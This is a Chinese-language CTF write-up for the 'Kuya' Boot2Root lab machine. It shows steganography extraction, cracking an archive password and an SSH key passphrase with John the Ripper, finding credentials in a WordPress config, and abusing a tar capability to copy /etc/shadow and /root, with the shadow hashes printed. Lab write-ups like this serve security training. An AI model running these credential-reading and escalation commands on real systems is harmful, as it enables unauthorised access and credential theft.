Kuya渗透实战（全网首发）

A Boot2Root machine with hints of CTF

In total there are 3 flags and you will be required to use some CTF skills to solve it.

靶机IP：192.168.8.148

nmap扫描结果：

image.png

直接80端口 web渗透

image.png

提示继续深入探索

在http://192.168.8.148/loot/4.jpg 中发现如下：（名字被隐藏了）

猜测是“Me very sad”

image.png

发现了 http://192.168.8.148/loot/ 下有好多图片

图像反隐写

据以往经验得知，应该是图像隐写术

直接wget 下载到kali中

wget http://192.168.8.148/loot/*.jpg

通过 steghide查看它们是否包含嵌入文件数据

steghide extract -ef *.jpg

密码直接空密码尝试，竟然成功了

image.png

提取出了如下文件：

image.png

查看了emb.txt与secret.txt文本，发现emb是BF码，secret是base64

BF码（brainfuck）在线解码工具

https://www.splitbrain.org/services/ook

拿去解码后，分别得到：

image.png

拿到了第一个flag：

V2hhdCBpcyBCYWx1dCA/

image.png

wireshark解包

用wireshark打开loot.pcapng，可以看到一个HTTP协议中，包含一个loot.7z的压缩文件

image.png

选择导出该压缩文件：

image.png

直接尝试解压缩：

7z e loot.7z 

image.png

压缩文件加密过了

尝试用rarcrack进行字典爆破，无果：

rarcrack --type 7z loot.7z

利用7z2john 解 hash

工具下载地址：

https://github.com/magnumripper/JohnTheRipper

解压密码：

manchester

解压成功后，生成id_rsa 和 id_rsa.pub

想必就是登录靶机的密钥吧

image.png

ssh登录靶机

查看公钥文件的内容

cat id_rsa.pub

发现了该密钥登录的用户名 test

image.png

公钥私钥要进行ssh登录验证前，属性必须是400 600 且不能他人访问权限，先赋权

chmod 600 id_rsa

进行登录

ssh -i id_rsa test@192.168.8.148

image.png

密钥加过密，我们尝试之前7z解压的密码manchester，并不能登录

ssh2john解密钥

将密钥用ssh2john生成hash：

ssh2john id_rsa > key

再利用john破解该hash：

john key

image.png

登录成功：

image.png

su kuya

登录后，查看下etc/passwd，发现了kuya该用户和myql数据库

image.png

在靶机中查找下可运行的二进制文件：

find / -perm -4000 2> /dev/null

image.png

找到靶机中网站的根目录，发现了wordpress站点

image.png

进入 html/wordpress,查看简单配置文件，因为该站点似乎没有安装成功

wp-config-sample.php

image.png

得到 数据库用户名、密码： kuya / Chrepia##@@!!

拿去直接

su kuya

image.png

进入根目录下，

image.png

直接拿到又一个flag： IL0v3C@f3HaV@nA

提权

查看当前目录下的所有文件发下

image.png

bash_history中 竟然能够以root权限执行 打包和解包shadow

cd /home/kuya
chown -R kuya
chown -R kuya /home/kiya
chown -R kuya /home/kuya
su root
cd /home/kuya
cat /etc/shadow
./tar -cvf shadow.tar /etc/shadow
tar -cvf shadow.tar /etc/shadow
which tar
getcap -r / 2>/dev/null
setcap cap_dac_read_search=ep
exit

可以借助这个进行提权

查了一下：setcap 命令可以持久化的将权限付给可执行文件

执行该两条命令：

tar -cvf shadow.tar /etc/shadow
tar xvf shadow.tar

意思是：先进行打包成shadow.tar，再在当前目录进行解包还原，执行后当前目录下生成了etc 目录

cat etc/shadow

拿到了所有的密码hash：

root:$6$xmBqiwRc$UE1ERWQecpCHwNsyE4yhSYv8wMD1H1yvB4TCBZQaoZMuxioJ0c7xE/Q/WwiRK2Vdf2Y2KGeHCh4NHAq5L4JTg0:17863:0:99999:7:::
daemon:*:17863:0:99999:7:::
bin:*:17863:0:99999:7:::
sys:*:17863:0:99999:7:::
sync:*:17863:0:99999:7:::
games:*:17863:0:99999:7:::
man:*:17863:0:99999:7:::
lp:*:17863:0:99999:7:::
mail:*:17863:0:99999:7:::
news:*:17863:0:99999:7:::
uucp:*:17863:0:99999:7:::
proxy:*:17863:0:99999:7:::
www-data:*:17863:0:99999:7:::
backup:*:17863:0:99999:7:::
list:*:17863:0:99999:7:::
irc:*:17863:0:99999:7:::
gnats:*:17863:0:99999:7:::
nobody:*:17863:0:99999:7:::
systemd-timesync:*:17863:0:99999:7:::
systemd-network:*:17863:0:99999:7:::
systemd-resolve:*:17863:0:99999:7:::
systemd-bus-proxy:*:17863:0:99999:7:::
_apt:*:17863:0:99999:7:::
messagebus:*:17863:0:99999:7:::
sshd:*:17863:0:99999:7:::
kuya:$6$MpPRKfei$KvGUeoeKXHNg8iSzMHPST4vtIe3GbjAHAf2gtJijQciwLtaeBNMi0pHjx1BSetZB/au8x.yKF9SB.nLtW3WRT.:17863:0:99999:7:::
test:!:17865:0:99999:7:::
mysql:!:17867:0:99999:7:::

拿到root用户的hash后，解不出来

root:$6$xmBqiwRc$UE1ERWQecpCHwNsyE4yhSYv8wMD1H1yvB4TCBZQaoZMuxioJ0c7xE/Q/WwiRK2Vdf2Y2KGeHCh4NHAq5L4JTg0:17863:0:99999:7:::

我们按照该方法可以尝试进入 root 目录下：

tar cvf shadow.tar /root
tar xvf shadow.tar

image.png

总结

该靶机总体来看依然是常规思路

1、发现多张图片，要想到是图像隐写，利用steghide提取出图像、音视频中的文本内容

2、在流量包中导出加密过的7z压缩文件后，首次尝试用7z2john进行john解压

3、提权过程大体相似，发现以root权限执行的命令，可以用来进行提权操作

靶机百度云下载

链接：https://pan.baidu.com/s/1Q0T-n-BsqBqS98GSOK0q1g
提取码：x77u